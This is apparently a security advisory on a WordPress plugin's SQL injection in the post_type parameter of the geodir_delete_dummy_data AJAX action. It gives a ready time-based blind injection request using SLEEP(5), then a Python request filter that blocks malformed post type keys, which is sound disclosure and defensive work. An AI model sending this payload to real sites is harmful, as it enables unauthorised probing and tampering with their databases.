The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.
POST /wp-admin/admin-ajax.php HTTP/1.1

action=geodir_delete_dummy_data&security=72951761a8&post_type=gd_place_detail+WHERE+4508=4508+AND+(SELECT+2067+FROM+(SELECT(SLEEP(5)))nWvn)--+
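A request-level check for the parameter shown above, as an added example that is not part of the original advisory or the plugin's code: it decodes a form-encoded admin-ajax.php body and only lets the geodir_delete_dummy_data action through when post_type is a single, well-formed post type key. The function name, the benign body and the allow-list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

ACTION = "geodir_delete_dummy_data"
# WordPress post type keys: lowercase alphanumerics, dashes, underscores; max 20 chars.
POST_TYPE_KEY = re.compile(r"[a-z0-9_-]{1,20}")

# Body of the request shown in the advisory.
ADVISORY_BODY = ("action=geodir_delete_dummy_data&security=72951761a8&post_type="
                 "gd_place_detail+WHERE+4508=4508+AND+(SELECT+2067+FROM+(SELECT(SLEEP(5)))nWvn)--+")
# Constructed benign body and allow-list (assumptions, not taken from the plugin).
BENIGN_BODY = "action=geodir_delete_dummy_data&security=0000000000&post_type=gd_place"
REGISTERED = {"gd_place"}


def check_body(body, registered=None):
    """Return (verdict, reason) for a form-encoded admin-ajax.php POST body."""
    # parse_qs URL-decodes values, so '+' and '%20' both become spaces before matching.
    params = parse_qs(body, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return ("ignore", "different action")
    values = params.get("post_type", [])
    # A repeated parameter can make a filter and the application see different values.
    if len(values) != 1:
        return ("block", "post_type missing or repeated")
    value = values[0]
    # Spaces, parentheses, '=' and uppercase SQL keywords all fail the key format.
    if not POST_TYPE_KEY.fullmatch(value):
        return ("block", "post_type is not a valid post type key")
    # Optional second gate: the key must also be one the site has registered.
    if registered is not None and value not in registered:
        return ("block", "post_type is not a registered post type")
    return ("allow", "ok")


if __name__ == "__main__":
    for name, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(name, check_body(body, REGISTERED))
```

The same two gates (key format, then membership in the registered set) are what the server-side handler needs before the value reaches any SQL statement.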